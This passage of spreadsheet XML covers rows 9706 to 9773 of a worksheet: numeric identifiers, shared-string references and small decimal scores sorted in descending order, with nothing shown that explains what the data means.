        <v>7374</v>
      </c>
      <c r="F9706" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9707" ht="15.75" customHeight="1">
      <c r="A9707" s="1">
        <v>16416.0</v>
      </c>
      <c r="B9707" s="2">
        <v>4.6307112E7</v>
      </c>
      <c r="C9707" s="2" t="s">
        <v>9274</v>
      </c>
      <c r="D9707" s="2">
        <v>1.0</v>
      </c>
      <c r="E9707" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9707" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9708" ht="15.75" customHeight="1">
      <c r="A9708" s="1">
        <v>17429.0</v>
      </c>
      <c r="B9708" s="2">
        <v>4.973193E7</v>
      </c>
      <c r="C9708" s="2" t="s">
        <v>9275</v>
      </c>
      <c r="D9708" s="2">
        <v>1.0</v>
      </c>
      <c r="E9708" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9708" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9709" ht="15.75" customHeight="1">
      <c r="A9709" s="1">
        <v>18387.0</v>
      </c>
      <c r="B9709" s="2">
        <v>5.2598337E7</v>
      </c>
      <c r="C9709" s="2" t="s">
        <v>9276</v>
      </c>
      <c r="D9709" s="2">
        <v>1.0</v>
      </c>
      <c r="E9709" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9709" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9710" ht="15.75" customHeight="1">
      <c r="A9710" s="1">
        <v>18589.0</v>
      </c>
      <c r="B9710" s="2">
        <v>5.3257577E7</v>
      </c>
      <c r="C9710" s="2" t="s">
        <v>9277</v>
      </c>
      <c r="D9710" s="2">
        <v>1.0</v>
      </c>
      <c r="E9710" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9710" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9711" ht="15.75" customHeight="1">
      <c r="A9711" s="1">
        <v>21599.0</v>
      </c>
      <c r="B9711" s="2">
        <v>2.4057956E7</v>
      </c>
      <c r="C9711" s="2" t="s">
        <v>9278</v>
      </c>
      <c r="D9711" s="2">
        <v>1.0</v>
      </c>
      <c r="E9711" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9711" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9712" ht="15.75" customHeight="1">
      <c r="A9712" s="1">
        <v>22315.0</v>
      </c>
      <c r="B9712" s="2">
        <v>3.3944898E7</v>
      </c>
      <c r="C9712" s="2" t="s">
        <v>8839</v>
      </c>
      <c r="D9712" s="2">
        <v>1.0</v>
      </c>
      <c r="E9712" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9712" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9713" ht="15.75" customHeight="1">
      <c r="A9713" s="1">
        <v>23086.0</v>
      </c>
      <c r="B9713" s="2">
        <v>5065721.0</v>
      </c>
      <c r="C9713" s="2" t="s">
        <v>9279</v>
      </c>
      <c r="D9713" s="2">
        <v>1.0</v>
      </c>
      <c r="E9713" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9713" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9714" ht="15.75" customHeight="1">
      <c r="A9714" s="1">
        <v>26346.0</v>
      </c>
      <c r="B9714" s="2">
        <v>1.6787776E7</v>
      </c>
      <c r="C9714" s="2" t="s">
        <v>9280</v>
      </c>
      <c r="D9714" s="2">
        <v>1.0</v>
      </c>
      <c r="E9714" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9714" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9715" ht="15.75" customHeight="1">
      <c r="A9715" s="1">
        <v>31503.0</v>
      </c>
      <c r="B9715" s="2">
        <v>5.0682317E7</v>
      </c>
      <c r="C9715" s="2" t="s">
        <v>9281</v>
      </c>
      <c r="D9715" s="2">
        <v>1.0</v>
      </c>
      <c r="E9715" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9715" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="9716" ht="15.75" customHeight="1">
      <c r="A9716" s="1">
        <v>2259.0</v>
      </c>
      <c r="B9716" s="2">
        <v>3.2370737E7</v>
      </c>
      <c r="C9716" s="2" t="s">
        <v>9282</v>
      </c>
      <c r="D9716" s="2">
        <v>1.0</v>
      </c>
      <c r="E9716" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9716" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="9717" ht="15.75" customHeight="1">
      <c r="A9717" s="1">
        <v>4723.0</v>
      </c>
      <c r="B9717" s="2">
        <v>4.3316426E7</v>
      </c>
      <c r="C9717" s="2" t="s">
        <v>9283</v>
      </c>
      <c r="D9717" s="2">
        <v>1.0</v>
      </c>
      <c r="E9717" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9717" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="9718" ht="15.75" customHeight="1">
      <c r="A9718" s="1">
        <v>703.0</v>
      </c>
      <c r="B9718" s="2">
        <v>2.0470626E7</v>
      </c>
      <c r="C9718" s="2" t="s">
        <v>9284</v>
      </c>
      <c r="D9718" s="2">
        <v>1.0</v>
      </c>
      <c r="E9718" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9718" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9719" ht="15.75" customHeight="1">
      <c r="A9719" s="1">
        <v>1794.0</v>
      </c>
      <c r="B9719" s="2">
        <v>2.9134786E7</v>
      </c>
      <c r="C9719" s="2" t="s">
        <v>9285</v>
      </c>
      <c r="D9719" s="2">
        <v>1.0</v>
      </c>
      <c r="E9719" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9719" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9720" ht="15.75" customHeight="1">
      <c r="A9720" s="1">
        <v>3355.0</v>
      </c>
      <c r="B9720" s="2">
        <v>3.781795E7</v>
      </c>
      <c r="C9720" s="2" t="s">
        <v>9286</v>
      </c>
      <c r="D9720" s="2">
        <v>1.0</v>
      </c>
      <c r="E9720" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9720" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9721" ht="15.75" customHeight="1">
      <c r="A9721" s="1">
        <v>4082.0</v>
      </c>
      <c r="B9721" s="2">
        <v>4.1187046E7</v>
      </c>
      <c r="C9721" s="2" t="s">
        <v>9287</v>
      </c>
      <c r="D9721" s="2">
        <v>1.0</v>
      </c>
      <c r="E9721" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9721" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9722" ht="15.75" customHeight="1">
      <c r="A9722" s="1">
        <v>4596.0</v>
      </c>
      <c r="B9722" s="2">
        <v>4.2806445E7</v>
      </c>
      <c r="C9722" s="2" t="s">
        <v>9288</v>
      </c>
      <c r="D9722" s="2">
        <v>1.0</v>
      </c>
      <c r="E9722" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9722" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9723" ht="15.75" customHeight="1">
      <c r="A9723" s="1">
        <v>4663.0</v>
      </c>
      <c r="B9723" s="2">
        <v>4.3133642E7</v>
      </c>
      <c r="C9723" s="2" t="s">
        <v>9289</v>
      </c>
      <c r="D9723" s="2">
        <v>1.0</v>
      </c>
      <c r="E9723" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9723" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9724" ht="15.75" customHeight="1">
      <c r="A9724" s="1">
        <v>5427.0</v>
      </c>
      <c r="B9724" s="2">
        <v>4.5572826E7</v>
      </c>
      <c r="C9724" s="2" t="s">
        <v>9290</v>
      </c>
      <c r="D9724" s="2">
        <v>1.0</v>
      </c>
      <c r="E9724" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9724" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9725" ht="15.75" customHeight="1">
      <c r="A9725" s="1">
        <v>8144.0</v>
      </c>
      <c r="B9725" s="2">
        <v>5.3157533E7</v>
      </c>
      <c r="C9725" s="2" t="s">
        <v>9291</v>
      </c>
      <c r="D9725" s="2">
        <v>1.0</v>
      </c>
      <c r="E9725" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9725" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9726" ht="15.75" customHeight="1">
      <c r="A9726" s="1">
        <v>8536.0</v>
      </c>
      <c r="B9726" s="2">
        <v>5.4115152E7</v>
      </c>
      <c r="C9726" s="2" t="s">
        <v>9292</v>
      </c>
      <c r="D9726" s="2">
        <v>1.0</v>
      </c>
      <c r="E9726" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9726" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9727" ht="15.75" customHeight="1">
      <c r="A9727" s="1">
        <v>10920.0</v>
      </c>
      <c r="B9727" s="2">
        <v>1.6731472E7</v>
      </c>
      <c r="C9727" s="2" t="s">
        <v>9293</v>
      </c>
      <c r="D9727" s="2">
        <v>1.0</v>
      </c>
      <c r="E9727" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9727" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9728" ht="15.75" customHeight="1">
      <c r="A9728" s="1">
        <v>11265.0</v>
      </c>
      <c r="B9728" s="2">
        <v>2.0689058E7</v>
      </c>
      <c r="C9728" s="2" t="s">
        <v>9294</v>
      </c>
      <c r="D9728" s="2">
        <v>1.0</v>
      </c>
      <c r="E9728" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9728" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9729" ht="15.75" customHeight="1">
      <c r="A9729" s="1">
        <v>12322.0</v>
      </c>
      <c r="B9729" s="2">
        <v>2.8498412E7</v>
      </c>
      <c r="C9729" s="2" t="s">
        <v>9295</v>
      </c>
      <c r="D9729" s="2">
        <v>1.0</v>
      </c>
      <c r="E9729" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9729" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9730" ht="15.75" customHeight="1">
      <c r="A9730" s="1">
        <v>12990.0</v>
      </c>
      <c r="B9730" s="2">
        <v>3.2729276E7</v>
      </c>
      <c r="C9730" s="2" t="s">
        <v>9296</v>
      </c>
      <c r="D9730" s="2">
        <v>1.0</v>
      </c>
      <c r="E9730" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9730" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9731" ht="15.75" customHeight="1">
      <c r="A9731" s="1">
        <v>13706.0</v>
      </c>
      <c r="B9731" s="2">
        <v>3.6201446E7</v>
      </c>
      <c r="C9731" s="2" t="s">
        <v>9297</v>
      </c>
      <c r="D9731" s="2">
        <v>1.0</v>
      </c>
      <c r="E9731" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9731" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9732" ht="15.75" customHeight="1">
      <c r="A9732" s="1">
        <v>16007.0</v>
      </c>
      <c r="B9732" s="2">
        <v>4.4985629E7</v>
      </c>
      <c r="C9732" s="2" t="s">
        <v>9298</v>
      </c>
      <c r="D9732" s="2">
        <v>1.0</v>
      </c>
      <c r="E9732" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9732" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="9733" ht="15.75" customHeight="1">
      <c r="A9733" s="1">
        <v>8684.0</v>
      </c>
      <c r="B9733" s="2">
        <v>5.440523E7</v>
      </c>
      <c r="C9733" s="2" t="s">
        <v>9299</v>
      </c>
      <c r="D9733" s="2">
        <v>1.0</v>
      </c>
      <c r="E9733" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9733" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="9734" ht="15.75" customHeight="1">
      <c r="A9734" s="1">
        <v>9937.0</v>
      </c>
      <c r="B9734" s="2">
        <v>5.6849686E7</v>
      </c>
      <c r="C9734" s="2" t="s">
        <v>9300</v>
      </c>
      <c r="D9734" s="2">
        <v>1.0</v>
      </c>
      <c r="E9734" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9734" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="9735" ht="15.75" customHeight="1">
      <c r="A9735" s="1">
        <v>11404.0</v>
      </c>
      <c r="B9735" s="2">
        <v>2.16113E7</v>
      </c>
      <c r="C9735" s="2" t="s">
        <v>9301</v>
      </c>
      <c r="D9735" s="2">
        <v>1.0</v>
      </c>
      <c r="E9735" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9735" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="9736" ht="15.75" customHeight="1">
      <c r="A9736" s="1">
        <v>15719.0</v>
      </c>
      <c r="B9736" s="2">
        <v>4.3984285E7</v>
      </c>
      <c r="C9736" s="2" t="s">
        <v>9302</v>
      </c>
      <c r="D9736" s="2">
        <v>1.0</v>
      </c>
      <c r="E9736" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9736" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="9737" ht="15.75" customHeight="1">
      <c r="A9737" s="1">
        <v>15663.0</v>
      </c>
      <c r="B9737" s="2">
        <v>4.3704846E7</v>
      </c>
      <c r="C9737" s="2" t="s">
        <v>9303</v>
      </c>
      <c r="D9737" s="2">
        <v>1.0</v>
      </c>
      <c r="E9737" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9737" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="9738" ht="15.75" customHeight="1">
      <c r="A9738" s="1">
        <v>18594.0</v>
      </c>
      <c r="B9738" s="2">
        <v>5.3259342E7</v>
      </c>
      <c r="C9738" s="2" t="s">
        <v>9304</v>
      </c>
      <c r="D9738" s="2">
        <v>1.0</v>
      </c>
      <c r="E9738" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9738" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="9739" ht="15.75" customHeight="1">
      <c r="A9739" s="1">
        <v>15444.0</v>
      </c>
      <c r="B9739" s="2">
        <v>4.3013185E7</v>
      </c>
      <c r="C9739" s="2" t="s">
        <v>9305</v>
      </c>
      <c r="D9739" s="2">
        <v>1.0</v>
      </c>
      <c r="E9739" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9739" s="2">
        <v>0.1086601307189543</v>
      </c>
    </row>
    <row r="9740" ht="15.75" customHeight="1">
      <c r="A9740" s="1">
        <v>32370.0</v>
      </c>
      <c r="B9740" s="2">
        <v>5602244.0</v>
      </c>
      <c r="C9740" s="2" t="s">
        <v>9306</v>
      </c>
      <c r="D9740" s="2">
        <v>1.0</v>
      </c>
      <c r="E9740" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9740" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="9741" ht="15.75" customHeight="1">
      <c r="A9741" s="1">
        <v>26546.0</v>
      </c>
      <c r="B9741" s="2">
        <v>1.775884E7</v>
      </c>
      <c r="C9741" s="2" t="s">
        <v>9307</v>
      </c>
      <c r="D9741" s="2">
        <v>1.0</v>
      </c>
      <c r="E9741" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9741" s="2">
        <v>0.1085470085470085</v>
      </c>
    </row>
    <row r="9742" ht="15.75" customHeight="1">
      <c r="A9742" s="1">
        <v>21685.0</v>
      </c>
      <c r="B9742" s="2">
        <v>2.5109898E7</v>
      </c>
      <c r="C9742" s="2" t="s">
        <v>9308</v>
      </c>
      <c r="D9742" s="2">
        <v>1.0</v>
      </c>
      <c r="E9742" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9742" s="2">
        <v>0.1085069444444444</v>
      </c>
    </row>
    <row r="9743" ht="15.75" customHeight="1">
      <c r="A9743" s="1">
        <v>13096.0</v>
      </c>
      <c r="B9743" s="2">
        <v>3.3490357E7</v>
      </c>
      <c r="C9743" s="2" t="s">
        <v>9309</v>
      </c>
      <c r="D9743" s="2">
        <v>1.0</v>
      </c>
      <c r="E9743" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9743" s="2">
        <v>0.1084656084656085</v>
      </c>
    </row>
    <row r="9744" ht="15.75" customHeight="1">
      <c r="A9744" s="1">
        <v>15019.0</v>
      </c>
      <c r="B9744" s="2">
        <v>4.1535538E7</v>
      </c>
      <c r="C9744" s="2" t="s">
        <v>9310</v>
      </c>
      <c r="D9744" s="2">
        <v>1.0</v>
      </c>
      <c r="E9744" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9744" s="2">
        <v>0.1084656084656085</v>
      </c>
    </row>
    <row r="9745" ht="15.75" customHeight="1">
      <c r="A9745" s="1">
        <v>13912.0</v>
      </c>
      <c r="B9745" s="2">
        <v>3.709805E7</v>
      </c>
      <c r="C9745" s="2" t="s">
        <v>9311</v>
      </c>
      <c r="D9745" s="2">
        <v>1.0</v>
      </c>
      <c r="E9745" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9745" s="2">
        <v>0.1084229390681003</v>
      </c>
    </row>
    <row r="9746" ht="15.75" customHeight="1">
      <c r="A9746" s="1">
        <v>10610.0</v>
      </c>
      <c r="B9746" s="2">
        <v>1.3708452E7</v>
      </c>
      <c r="C9746" s="2" t="s">
        <v>9312</v>
      </c>
      <c r="D9746" s="2">
        <v>1.0</v>
      </c>
      <c r="E9746" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9746" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="9747" ht="15.75" customHeight="1">
      <c r="A9747" s="1">
        <v>20503.0</v>
      </c>
      <c r="B9747" s="2">
        <v>1.2950568E7</v>
      </c>
      <c r="C9747" s="2" t="s">
        <v>9313</v>
      </c>
      <c r="D9747" s="2">
        <v>1.0</v>
      </c>
      <c r="E9747" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9747" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="9748" ht="15.75" customHeight="1">
      <c r="A9748" s="1">
        <v>31599.0</v>
      </c>
      <c r="B9748" s="2">
        <v>5.1342336E7</v>
      </c>
      <c r="C9748" s="2" t="s">
        <v>9314</v>
      </c>
      <c r="D9748" s="2">
        <v>1.0</v>
      </c>
      <c r="E9748" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9748" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="9749" ht="15.75" customHeight="1">
      <c r="A9749" s="1">
        <v>12304.0</v>
      </c>
      <c r="B9749" s="2">
        <v>2.8354111E7</v>
      </c>
      <c r="C9749" s="2" t="s">
        <v>9315</v>
      </c>
      <c r="D9749" s="2">
        <v>1.0</v>
      </c>
      <c r="E9749" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9749" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="9750" ht="15.75" customHeight="1">
      <c r="A9750" s="1">
        <v>23103.0</v>
      </c>
      <c r="B9750" s="2">
        <v>5.0916928E7</v>
      </c>
      <c r="C9750" s="2" t="s">
        <v>9316</v>
      </c>
      <c r="D9750" s="2">
        <v>1.0</v>
      </c>
      <c r="E9750" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9750" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="9751" ht="15.75" customHeight="1">
      <c r="A9751" s="1">
        <v>15890.0</v>
      </c>
      <c r="B9751" s="2">
        <v>4.4554128E7</v>
      </c>
      <c r="C9751" s="2" t="s">
        <v>9317</v>
      </c>
      <c r="D9751" s="2">
        <v>1.0</v>
      </c>
      <c r="E9751" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9751" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="9752" ht="15.75" customHeight="1">
      <c r="A9752" s="1">
        <v>437.0</v>
      </c>
      <c r="B9752" s="2">
        <v>1.7015984E7</v>
      </c>
      <c r="C9752" s="2" t="s">
        <v>9318</v>
      </c>
      <c r="D9752" s="2">
        <v>1.0</v>
      </c>
      <c r="E9752" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9752" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="9753" ht="15.75" customHeight="1">
      <c r="A9753" s="1">
        <v>7335.0</v>
      </c>
      <c r="B9753" s="2">
        <v>5.092632E7</v>
      </c>
      <c r="C9753" s="2" t="s">
        <v>9319</v>
      </c>
      <c r="D9753" s="2">
        <v>1.0</v>
      </c>
      <c r="E9753" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9753" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="9754" ht="15.75" customHeight="1">
      <c r="A9754" s="1">
        <v>9563.0</v>
      </c>
      <c r="B9754" s="2">
        <v>5.6048578E7</v>
      </c>
      <c r="C9754" s="2" t="s">
        <v>9320</v>
      </c>
      <c r="D9754" s="2">
        <v>1.0</v>
      </c>
      <c r="E9754" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9754" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="9755" ht="15.75" customHeight="1">
      <c r="A9755" s="1">
        <v>11258.0</v>
      </c>
      <c r="B9755" s="2">
        <v>2.0591965E7</v>
      </c>
      <c r="C9755" s="2" t="s">
        <v>9321</v>
      </c>
      <c r="D9755" s="2">
        <v>1.0</v>
      </c>
      <c r="E9755" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9755" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="9756" ht="15.75" customHeight="1">
      <c r="A9756" s="1">
        <v>13879.0</v>
      </c>
      <c r="B9756" s="2">
        <v>3.6990313E7</v>
      </c>
      <c r="C9756" s="2" t="s">
        <v>9322</v>
      </c>
      <c r="D9756" s="2">
        <v>1.0</v>
      </c>
      <c r="E9756" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9756" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="9757" ht="15.75" customHeight="1">
      <c r="A9757" s="1">
        <v>19651.0</v>
      </c>
      <c r="B9757" s="2">
        <v>5.6332414E7</v>
      </c>
      <c r="C9757" s="2" t="s">
        <v>9323</v>
      </c>
      <c r="D9757" s="2">
        <v>1.0</v>
      </c>
      <c r="E9757" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9757" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="9758" ht="15.75" customHeight="1">
      <c r="A9758" s="1">
        <v>8.0</v>
      </c>
      <c r="B9758" s="2">
        <v>1.01897E7</v>
      </c>
      <c r="C9758" s="2" t="s">
        <v>9324</v>
      </c>
      <c r="D9758" s="2">
        <v>1.0</v>
      </c>
      <c r="E9758" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9758" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9759" ht="15.75" customHeight="1">
      <c r="A9759" s="1">
        <v>75.0</v>
      </c>
      <c r="B9759" s="2">
        <v>1.1780795E7</v>
      </c>
      <c r="C9759" s="2" t="s">
        <v>9325</v>
      </c>
      <c r="D9759" s="2">
        <v>1.0</v>
      </c>
      <c r="E9759" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9759" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9760" ht="15.75" customHeight="1">
      <c r="A9760" s="1">
        <v>162.0</v>
      </c>
      <c r="B9760" s="2">
        <v>1.3756475E7</v>
      </c>
      <c r="C9760" s="2" t="s">
        <v>9326</v>
      </c>
      <c r="D9760" s="2">
        <v>1.0</v>
      </c>
      <c r="E9760" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9760" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9761" ht="15.75" customHeight="1">
      <c r="A9761" s="1">
        <v>171.0</v>
      </c>
      <c r="B9761" s="2">
        <v>1.3839129E7</v>
      </c>
      <c r="C9761" s="2" t="s">
        <v>9327</v>
      </c>
      <c r="D9761" s="2">
        <v>1.0</v>
      </c>
      <c r="E9761" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9761" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9762" ht="15.75" customHeight="1">
      <c r="A9762" s="1">
        <v>944.0</v>
      </c>
      <c r="B9762" s="2">
        <v>2.2507477E7</v>
      </c>
      <c r="C9762" s="2" t="s">
        <v>9328</v>
      </c>
      <c r="D9762" s="2">
        <v>1.0</v>
      </c>
      <c r="E9762" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9762" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9763" ht="15.75" customHeight="1">
      <c r="A9763" s="1">
        <v>1124.0</v>
      </c>
      <c r="B9763" s="2">
        <v>2.4167153E7</v>
      </c>
      <c r="C9763" s="2" t="s">
        <v>9329</v>
      </c>
      <c r="D9763" s="2">
        <v>1.0</v>
      </c>
      <c r="E9763" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9763" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9764" ht="15.75" customHeight="1">
      <c r="A9764" s="1">
        <v>1362.0</v>
      </c>
      <c r="B9764" s="2">
        <v>2.5976145E7</v>
      </c>
      <c r="C9764" s="2" t="s">
        <v>9330</v>
      </c>
      <c r="D9764" s="2">
        <v>1.0</v>
      </c>
      <c r="E9764" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9764" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9765" ht="15.75" customHeight="1">
      <c r="A9765" s="1">
        <v>1785.0</v>
      </c>
      <c r="B9765" s="2">
        <v>2.9095344E7</v>
      </c>
      <c r="C9765" s="2" t="s">
        <v>9331</v>
      </c>
      <c r="D9765" s="2">
        <v>1.0</v>
      </c>
      <c r="E9765" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9765" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9766" ht="15.75" customHeight="1">
      <c r="A9766" s="1">
        <v>2399.0</v>
      </c>
      <c r="B9766" s="2">
        <v>3.3389698E7</v>
      </c>
      <c r="C9766" s="2" t="s">
        <v>9332</v>
      </c>
      <c r="D9766" s="2">
        <v>1.0</v>
      </c>
      <c r="E9766" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9766" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9767" ht="15.75" customHeight="1">
      <c r="A9767" s="1">
        <v>2996.0</v>
      </c>
      <c r="B9767" s="2">
        <v>3.6272307E7</v>
      </c>
      <c r="C9767" s="2" t="s">
        <v>9333</v>
      </c>
      <c r="D9767" s="2">
        <v>1.0</v>
      </c>
      <c r="E9767" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9767" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9768" ht="15.75" customHeight="1">
      <c r="A9768" s="1">
        <v>3023.0</v>
      </c>
      <c r="B9768" s="2">
        <v>3.6424458E7</v>
      </c>
      <c r="C9768" s="2" t="s">
        <v>9334</v>
      </c>
      <c r="D9768" s="2">
        <v>1.0</v>
      </c>
      <c r="E9768" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9768" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9769" ht="15.75" customHeight="1">
      <c r="A9769" s="1">
        <v>3043.0</v>
      </c>
      <c r="B9769" s="2">
        <v>3.648619E7</v>
      </c>
      <c r="C9769" s="2" t="s">
        <v>9335</v>
      </c>
      <c r="D9769" s="2">
        <v>1.0</v>
      </c>
      <c r="E9769" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9769" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9770" ht="15.75" customHeight="1">
      <c r="A9770" s="1">
        <v>3144.0</v>
      </c>
      <c r="B9770" s="2">
        <v>3.695043E7</v>
      </c>
      <c r="C9770" s="2" t="s">
        <v>9336</v>
      </c>
      <c r="D9770" s="2">
        <v>1.0</v>
      </c>
      <c r="E9770" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9770" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9771" ht="15.75" customHeight="1">
      <c r="A9771" s="1">
        <v>3246.0</v>
      </c>
      <c r="B9771" s="2">
        <v>3.7381225E7</v>
      </c>
      <c r="C9771" s="2" t="s">
        <v>9337</v>
      </c>
      <c r="D9771" s="2">
        <v>1.0</v>
      </c>
      <c r="E9771" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9771" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9772" ht="15.75" customHeight="1">
      <c r="A9772" s="1">
        <v>3519.0</v>
      </c>
      <c r="B9772" s="2">
        <v>3.859903E7</v>
      </c>
      <c r="C9772" s="2" t="s">
        <v>9338</v>
      </c>
      <c r="D9772" s="2">
        <v>1.0</v>
      </c>
      <c r="E9772" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9772" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="9773" ht="15.75" customHeight="1">
      <c r="A9773" s="1">
        <v>4220.0</v>
      </c>
      <c r="B9773" s="2">
        <v>4.1720713E7</v>
      </c>
      <c r="C9773" s="2" t="s">
        <v>9339</v>
      </c>
      <c r="D9773" s="2">
        <v>1.0</v>
      </c>
      <c r="E9773" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9773" s="2">
